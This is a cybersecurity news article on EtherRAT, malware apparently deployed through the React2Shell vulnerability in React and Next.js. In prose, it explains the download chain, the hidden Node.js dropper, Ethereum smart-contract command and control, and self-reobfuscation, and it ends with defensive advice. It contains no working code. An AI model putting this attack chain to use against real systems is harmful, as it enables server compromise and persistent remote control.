Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.
Redazione RHC : 11 December 2025 07:13
Just two days after the critical React2Shell vulnerability was discovered, Sysdig researchers discovered a new malware, EtherRAT, in a compromised Next.js application. The malware uses Ethereum smart contracts for communication and achieves persistence on Linux systems in five ways.
Experts believe the malware is related to tools used by the North Korean Lazarus group. However, EtherRAT differs from known samples in several key ways.
React2Shell (CVE-2025-55182) is a critical vulnerability in Meta’s popular React JavaScript library. The issue, which received a CVSS score of 10 out of 10, is related to insecure data deserialization in React Server components and allows remote code execution on the server using a regular HTTP request (without authentication or privileges).
The bug affects the latest versions 19.0, 19.1.0, 19.1.1, and 19.2.0 in default configurations, as well as the popular Next.js framework. Fixes have been released for React versions 19.0.1, 19.1.2, and 19.2.1, as well as for the affected Next.js versions.
Experts warn that similar issues may occur in other libraries with React Server implementations, including: Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodSDK, and Waku.
The vulnerability has already been exploited by Chinese hacker groups Earth Lamia and Jackpot Panda , and at least 30 organizations have been affected by the attacks.
The attacks begin by exploiting the React2Shell vulnerability. Once exploited, a base64-encoded shell command is executed on the target system. This command is used to download a malicious s.sh script via curl, wget, or python3. The command is repeated every 300 seconds until the download is complete. The resulting script is verified, granted execute permissions, and launched.
The script then creates a hidden directory under $HOME/.local/share/, where it downloads version 20.10.0 of the legitimate Node.js runtime directly from the official website nodejs.org . It then writes an encrypted payload and an obfuscated JavaScript dropper, which is executed via the downloaded Node binary. The script then deletes itself.
The dropper reads the encrypted blob, decrypts it using a hardcoded AES-256-CBC key, and writes the result as another hidden JavaScript file. The decrypted payload is EtherRAT, deployed using a previously installed Node.js.
According to experts, EtherRAT uses Ethereum smart contracts for control, making attackers resistant to blocking. The malware simultaneously queries nine public Ethereum RPC providers and selects the result based on majority voting, protecting against poisoning a single node or sinkhole.
Every 500 milliseconds, the malware sends random URLs, similar to CDN addresses, to its command-and-control server and executes the returned JavaScript code via AsyncFunction . This provides attackers with a fully interactive Node.js shell.
According to analysts, North Korean hackers have already used smart contracts to distribute malware. This technique, called EtherHiding , has been described in reports from Google and GuardioLabs . Sysdig also notes that the encrypted download pattern in EtherRAT matches that of the BeaverTail malware used in the Contagious Interview campaign linked to North Korea.
The report also highlights EtherRAT’s extreme aggressiveness on Linux systems. The malware uses five mechanisms to infiltrate the infected system:
Another unique feature of EtherRAT is its self-updating ability. The malware uploads its source code to an API endpoint and receives replaced code with the same functionality but with different obfuscation. The malware then overwrites itself and launches a new process with the updated payload. According to researchers, this helps evade static detection mechanisms, can hinder analysis, or add specific functionality.
In its report, Sysdig provides a short list of indicators of compromise related to the EtherRAT distribution infrastructure and Ethereum contracts . The researchers recommend checking for the presence of the listed persistence mechanisms, monitoring Ethereum RPC traffic, monitoring application logs, and regularly rotating credentials.
Redazione